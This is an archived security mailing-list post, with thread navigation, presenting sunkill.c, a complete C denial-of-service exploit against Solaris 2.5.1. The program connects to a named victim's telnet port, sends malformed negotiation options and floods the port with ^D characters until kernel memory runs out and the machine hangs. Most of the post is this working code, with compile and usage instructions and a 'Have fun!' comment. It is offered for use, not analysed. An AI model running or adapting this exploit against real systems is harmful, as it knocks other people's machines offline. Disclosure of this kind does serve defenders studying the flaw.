To kill a sun:

• Previous message: Wilton Wong - ListMail: "Buffer Overruns in RedHat 5.0"
• Next in thread: David LeBlanc: "Re: To kill a sun:"
• Reply: David LeBlanc: "Re: To kill a sun:"
• Reply: James Lockwood: "Re: To kill a sun:"
• Reply: Craig Johnston: "Re: To kill a sun:"
• Reply: Robert Sink: "Re: To kill a sun:"
• Reply: Darren Reed: "Re: To kill a sun:"
• Reply: Paul Nash: "Re: To kill a sun:"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is sunkill.c

It Affects at least solaris 2.5.1 machines, both sun4c and sun4m
achitecutures.  I imagine it affects all solaris 2.5.1 machines, both sparc
and x86, but im not sure.  It basically works by opening a telnet
connection on the victim machine and sends a few bad telnet negotiation
options, then flooods the port with lots of ^D characters.  This uses all
the streams memory (i think) on the victims machine and causes the kernel
to get very angry.  The machien crawls to a halt, the cursor in X stops
moving, the machine is unresponsive to the network.  Its a bad situation
all around.

/*
    **  To make, if your system is BSD'ish:  gcc <thisfile>
    **       ...if your system is SysV'ish:  gcc -lnsl -lsocket <thisfile>
    **
    **  Usage: a.out <victim's hostname>
    **
    **  Have fun!
    */

    #include <signal.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <arpa/telnet.h>
    #include <string.h>
    #include <unistd.h>

    #define BUFSIZE 100
    #define DOTS

    void catchit(void)
    {
        printf("\nCaught SIGPIPE -- your link may be too slow.\n");
        exit(1);
    }

    int main(int argc, char *argv[])
    {
        unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO,  \
        TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \
        TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO};

        unsigned char nastybuf[BUFSIZE];
        struct sockaddr_in sin;
        struct servent *sp;
        struct hostent *hp;
        int s;

        typedef void (*sig_t) (int);
        signal(SIGPIPE,(sig_t)catchit);

        memset(nastybuf,4,BUFSIZE);  /* ascii 4 = ^D */

        if (!(s = socket(AF_INET, SOCK_STREAM, 0))) {
              printf("no socket\n");
              exit(1);
        }

        if (!(hp = gethostbyname(argv[1]))) {
            printf("unknown host\n");
            exit(1);
        }

        bzero(&sin,sizeof(sin));
        bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
        sin.sin_family = AF_INET;
        sp = getservbyname("telnet","tcp");
        sin.sin_port = sp->s_port;

        if (connect(s,(struct sockaddr *)&sin,sizeof(sin)) == -1) {
            printf("can't connect to host\n");
            exit(1);
        }

        printf("connected to %s\n",argv[1]);
        write(s,kludge_telopt,21);   /* kludge some telnet negotiation */

        /*  "Let them eat ^Ds..." */

        while (write(s,nastybuf,BUFSIZE) != -1) {

    #ifdef DOTS
            write(STDOUT_FILENO,".",1);
    #endif
        }
    }

Jason

--
     Jason Price    |     If you want to build a ship, don't drum up people
      Theta Xi,     |   together to collect wood and don't assign them tasks
   Beta, Alpha 449  | and work, but rather teach them to long for the endless
 jpriceat_private |    immensity of the sea. -- Antoine de Saint Exupery

• Next message: Wilton Wong - ListMail: "uffer Overrun in RedHat 5.0"
• Previous message: Wilton Wong - ListMail: "Buffer Overruns in RedHat 5.0"
• Next in thread: David LeBlanc: "Re: To kill a sun:"
• Reply: David LeBlanc: "Re: To kill a sun:"
• Reply: James Lockwood: "Re: To kill a sun:"
• Reply: Craig Johnston: "Re: To kill a sun:"
• Reply: Robert Sink: "Re: To kill a sun:"
• Reply: Darren Reed: "Re: To kill a sun:"
• Reply: Paul Nash: "Re: To kill a sun:"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:35:37 PDT